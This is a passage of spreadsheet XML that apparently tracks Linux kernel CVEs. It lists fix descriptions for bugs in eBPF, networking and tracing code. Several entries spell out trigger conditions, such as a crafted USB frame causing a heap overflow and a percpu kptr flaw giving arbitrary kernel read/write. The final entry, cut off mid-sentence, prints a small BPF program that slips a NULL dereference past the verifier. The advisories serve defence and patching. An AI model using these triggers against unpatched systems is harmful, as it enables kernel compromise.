  two via this check and the 2/3 parse policy respectively).</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98022</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98024</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="inlineStr"/>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/ism: folio_put() after error
dmb-&gt;cpu_addr was allocated via folio_alloc(). Use folio_put() instead of
kfree() in the error exit of ism_alloc_dmb() to avoid slab allocator
corruption.
While at it, reset dmb-&gt;cpu_addr after folio_put to avoid unintentional UAF
by future callers.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98024</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98025</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="inlineStr"/>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: usb: cx82310_eth: drop URB after 0xffff reboot sentinel to prevent partial_data heap overflow
The 0xffff length sentinel detects a router reboot and schedules
re-enabling of ethernet mode, but then falls through to the rest
of the loop body.  The next check is
	} else if (len &gt; CX82310_MTU) {
which is the else of the just-matched if -- it never fires for
len == 0xffff.  The MTU bound that normally caps the
incomplete-packet save path is silently bypassed.
With 0xffff &gt; skb-&gt;len always true (rx_urb_size is 4096), the
incomplete-packet branch saves dev-&gt;partial_len = skb-&gt;len bytes
into dev-&gt;partial_data.  partial_data is kmalloc(hard_mtu) =
kmalloc(CX82310_MTU + 2) = 1516 bytes, but skb-&gt;len after the
2-byte header pull can be up to 4094.  A device that sends a
4096-byte URB starting with [0xff 0xff] therefore copies 4094
device-provided bytes into a buffer allocated for 1516 bytes,
exceeding its requested size by 2578 bytes.
The next URB then reads dev-&gt;partial_len (4094) back from the same
1516-byte buffer and dev-&gt;partial_rem (65535 - 4094 = 61441) from
the new URB's ~4KB skb, both well past their allocations, and
delivers the spliced result as a 64KB "frame" to the network
stack.
Bail out of rx_fixup after scheduling the re-enable work; the
remainder of a reboot-marker URB is not meaningful packet data.
This restores the invariant that partial_len &lt; CX82310_MTU + 2 on
the save path, since every other route there has already passed
the MTU check.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98025</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98026</t>
        </is>
      </c>
      <c r="D660" s="5" t="inlineStr"/>
      <c r="E660" s="5" t="inlineStr"/>
      <c r="F660" s="5" t="inlineStr"/>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="inlineStr"/>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr"/>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: mcast: properly convert mglist to rcu
Sashiko reported a bug [1] that br_multicast_del_port_group unlists the
port group not using proper rcu helper that preserves the next pointer and
after that immediately frees the port group without waiting for rcu grace
period. The only rcu walker of mglist is br_multicast_list_adjacent() and
it turns out that function has always been buggy because mglist was never
properly converted to RCU. Fix it by converting it to rcu and moving its
initialization after eth_addr's. Initializing p-&gt;next can use
RCU_INIT_POINTER because we have a barrier from the hlist_add_head_rcu call
later, besides we're initializing an unpublished structure anyway.
[1] https://netdev-ai.bots.linux.dev/sashiko/#/patchset/20260826014200.362304-1-littleddfu%40gmail.com</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98026</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98028</t>
        </is>
      </c>
      <c r="D661" s="5" t="inlineStr"/>
      <c r="E661" s="5" t="inlineStr"/>
      <c r="F661" s="5" t="inlineStr"/>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="inlineStr"/>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr"/>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr"/>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: nfp: drop the replaced rule from the list when reprogramming fails
nfp_net_fs_add() replaces an existing rule by deleting it from the
hardware, decrementing nn-&gt;fs.count and programming the new one.  If
nfp_net_fs_add_hw() fails the old entry stays on nn-&gt;fs.list - only the
success path reaches list_replace() - so the list is one longer than
nn-&gt;fs.count, and it advertises a rule whose hardware entry has already
been torn down.
nn-&gt;fs.count is what ETHTOOL_GRXCLSRLCNT reports, so userspace then sizes
its buffer one entry short of what the GRXCLSRLALL walk wants to write.
That used to overwrite one u32 past the allocation; since the walk is
bounded it is a permanent -EMSGSIZE instead, as nothing ever resyncs the
counter.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98028</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98031</t>
        </is>
      </c>
      <c r="D662" s="5" t="inlineStr"/>
      <c r="E662" s="5" t="inlineStr"/>
      <c r="F662" s="5" t="inlineStr"/>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="inlineStr"/>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr"/>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nexthop: Initialize extack in remove_nh_grp_entry()
remove_nh_grp_entry() prints the extack message when a listener fails
to replace the reduced nexthop group. However, extack is not
initialized and listeners are not required to set a message when
returning an error. Neither netdevsim nor mlxsw do so when an
allocation fails, resulting in the dereference of an uninitialized
stack pointer.
Fix by zero-initializing extack, as was done in commit 6347c5314cee
("nexthop: initialize extack in nh_res_bucket_migrate()").</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98031</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98032</t>
        </is>
      </c>
      <c r="D663" s="5" t="inlineStr"/>
      <c r="E663" s="5" t="inlineStr"/>
      <c r="F663" s="5" t="inlineStr"/>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="inlineStr"/>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr"/>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr"/>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix subbuf resize races with trace_pipe_raw readers
Concurrent subbuffer resizes may crash trace_pipe_raw readers or leak
uninitialized memory to userspace due to stale size values.
Modify ring_buffer_alloc_read_page() to handle the resizing of an
existing buffer_data_read_page if necessary and add a new
ring_buffer_read_page_size(). This new function enables ring-buffer
buffer_data_read_page users to not call the racy
ring_buffer_subbuf_size_get(). This makes the spare_size member of
ftrace_buffer_info redundant.
Finally, handle buffer_data_read_page/reader_page order discrepancy in
ring_buffer_read_page(). On a mismatch simply copy manually the data to
the buffer_data_read_page.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98032</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98033</t>
        </is>
      </c>
      <c r="D664" s="5" t="inlineStr"/>
      <c r="E664" s="5" t="inlineStr"/>
      <c r="F664" s="5" t="inlineStr"/>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="inlineStr"/>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr"/>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve inner map identity in callback frames
Callback frame constructors initialize map-typed argument registers with
__mark_reg_known_zero() and then restore map_ptr. This clears map_uid,
which is the only field distinguishing inner maps that share an
inner_map_meta template.
When a timer callback invokes bpf_for_each_map_elem() on a second inner
map, both the saved first map and the second map value can reach the nested
callback as the same template with map_uid zero. bpf_timer_init() then
accepts pairing the timer from the second map with the first map.
The runtime records the first map in the timer without taking a reference.
Freeing that map does not find the timer stored in the second map, so a
later timer callback dereferences the freed map.
Copy map_uid from the same caller register as map_ptr when constructing
for-each, timer/workqueue, and task-work callback arguments. The existing
identity check can then reject mismatched inner maps while allowing a
callback value to be paired with its actual map.</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98033</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98034</t>
        </is>
      </c>
      <c r="D665" s="5" t="inlineStr"/>
      <c r="E665" s="5" t="inlineStr"/>
      <c r="F665" s="5" t="inlineStr"/>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="inlineStr"/>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr">
        <is>
          <t>checkpoint, rust</t>
        </is>
      </c>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr"/>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark NULL kptr stores precise
check_map_kptr_access() permits a scalar store into an untrusted kptr
field only when the register is known to contain zero. Unlike other
verifier checks whose outcome depends on a scalar value, it does not mark
that register precise.
A state checkpoint reached with an imprecise zero can therefore prune a
second path that reaches the store with an arbitrary nonzero scalar. The
program can write attacker-controlled bits into the kptr field and load
them back as a PTR_TO_BTF_ID.
Call mark_chain_precision() before accepting a known-zero register. This
forces state equivalence to compare its scalar range and makes the verifier
visit and reject a path carrying a nonzero value.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98034</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98035</t>
        </is>
      </c>
      <c r="D666" s="5" t="inlineStr"/>
      <c r="E666" s="5" t="inlineStr"/>
      <c r="F666" s="5" t="inlineStr"/>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="inlineStr"/>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr"/>
      <c r="S666" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Cancel special fields when recycling rhtab elements
rhtab_map_update_existing() and rhtab_delete_elem() call
bpf_obj_free_fields() when replacing or deleting a value. These map
operations can run from BPF programs in NMI context, where releasing a
referenced kptr or another complex field is not generally safe.
Array and hash maps avoid that problem by cancelling only the asynchronous
fields which can be stopped safely in the caller context. Other ownership
state remains attached to the allocation until its memory allocator
destructor performs the final cleanup.
Use bpf_obj_cancel_fields() for the corresponding rhtab paths as well. This
cancels timers, workqueues, and task work while allowing rhtab_mem_dtor() to
release referenced kptrs when the allocation is eventually destroyed.
[ kkd: Rebased, used direct helper calls, and rewrote the commit log ]</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98035</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98036</t>
        </is>
      </c>
      <c r="D667" s="5" t="inlineStr"/>
      <c r="E667" s="5" t="inlineStr"/>
      <c r="F667" s="5" t="inlineStr"/>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="inlineStr"/>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr"/>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Preserve special fields in recycled rhtab elements
rhtab_map_update_elem() initializes special fields after obtaining an
element from bpf_mem_cache_alloc(). The allocator can return a fresh,
zeroed unit, or recycle one from its RCU-pending lists before the
registered destructor has run.
A BPF program can retain a map-value pointer after deleting its element
and initialize and arm a timer through that pointer. If the deleted unit
is recycled, check_and_init_map_value() clears the only pointer to the
timer. Neither a later deletion nor rhtab_mem_dtor() can then cancel it,
and the callback can run with its key and value pointing into freed memory.
Do not reinitialize special fields on insertion. Fresh allocator units are
already zeroed. For recycled units, the special fields are ownership state
that must remain visible to the eventual destructor. copy_map_value()
already skips those fields, matching the non-preallocated hash-map path and
the lifecycle established by commit 275c30bcee66 ("bpf: Don't reinit map
value in prealloc_lru_pop").
[ kkd: Split out the fix and rewrote the commit log ]</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98036</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98037</t>
        </is>
      </c>
      <c r="D668" s="5" t="inlineStr"/>
      <c r="E668" s="5" t="inlineStr"/>
      <c r="F668" s="5" t="inlineStr"/>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="inlineStr"/>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr"/>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject untrusted allocated-object pointers
When the final RCU read-side critical section ends, a local kptr is demoted
to PTR_UNTRUSTED but retains MEM_ALLOC. The pointer may be NULL or may refer
to an object whose lifetime is no longer protected.
type_is_ptr_alloc_obj() nevertheless recognizes any PTR_TO_BTF_ID with
MEM_ALLOC as a live allocated object. In particular, a refcount-only local
kptr never carries NON_OWN_REF, so it still passes the
bpf_refcount_acquire() argument check after RCU protection ends. The kfunc
can then dereference NULL or stale memory.
Make type_is_ptr_alloc_obj() reject PTR_UNTRUSTED pointers. Since
type_is_non_owning_ref() is based on the same predicate, graph kfunc
arguments obey the same live-object requirement. Fault-protected reads of
the demoted pointer remain valid: writes are already rejected, and read
fixups use bpf_may_fault_on_deref() rather than this predicate.
[ kkd: Rewrote commit log ]</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98037</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98038</t>
        </is>
      </c>
      <c r="D669" s="5" t="inlineStr"/>
      <c r="E669" s="5" t="inlineStr"/>
      <c r="F669" s="5" t="inlineStr"/>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="inlineStr"/>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr"/>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Keep refcount_acquire nullable for borrowed RCU kptrs
bpf_refcount_acquire() is fallible for a borrowed reference because the
object may have reached a zero refcount. The verifier therefore keeps
KF_RET_NULL on the return value unless the argument is an owning reference.
An RCU-protected load of a local kptr is marked MEM_ALLOC, but it only
receives NON_OWN_REF when the pointee contains a graph node. A refcounted
object without a graph node consequently looks like an owning reference
even though the loaded register has no acquired reference state. If the
program drops the last real reference while remaining in the RCU critical
section, refcount_inc_not_zero() returns NULL while the verifier treats the
result as non-NULL.
Only classify the argument as owning when it is backed by a verifier-tracked
reference. This retains the non-NULL return for pointers from bpf_obj_new(),
bpf_kptr_xchg(), or an earlier successful acquisition, while requiring a
NULL check for borrowed RCU kptrs.
[ kkd: Rewrote commit log ]</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98038</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98039</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Require MEM_PERCPU for percpu kptr stores
map_kptr_match_type() treats perm_flags as the set of register type flags
that a kptr field permits. Adding MEM_PERCPU to that set for
BPF_KPTR_PERCPU does not require the source register to carry it, however.
The subset test consequently accepts both a plain bpf_obj_new() allocation
and a referenced kernel pointer into a __percpu_kptr map field.
Loads from the field are always marked MEM_PERCPU. Consumers then treat the
stored value as the cookie returned by bpf_percpu_obj_new(): per-CPU pointer
helpers relocate it, and map teardown selects the per-CPU free path. A plain
allocation can therefore provide an arbitrary kernel read/write, while a
kernel pointer can be relocated into an invalid address or sent through a
missing destructor.
Require the source MEM_PERCPU flag to match the destination field kind.
This preserves valid bpf_percpu_obj_new() stores and rejects both the
program-BTF and kernel-BTF variants.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98039</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98040</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark the zero register precise for a register-form NULL check
check_cond_jmp_op() accepts "if rA &lt;op&gt; rB" as a NULL check for a
nullable pointer rA when rB is a scalar known to be zero,
lifts PTR_MAYBE_NULL from rA in the corresponding branch and does not
mark rB precise. Consider the following program:
  r0 = bpf_get_prandom_u32();
  r6 = 1;                  /* the r6 == 0 path is explored first */
  if (r0 == 0) goto 1f;
  r6 = 0;
1:
  r0 = bpf_map_lookup_elem(map, &amp;0);  /* absent, NULL at runtime */
  if (r0 == r6) goto 2f;   /* taken as a NULL check for r0       */
  *(u8 *)(r0 + 0);         /* verifier: map value; runtime: zero */
2:
  return 0;
The r6 == 0 path is explored first and the dereference is accepted.
The r6 == 1 path is pruned at the checkpoint recorded for (1),
so the comparison is never verified with a non-zero r6. At runtime a
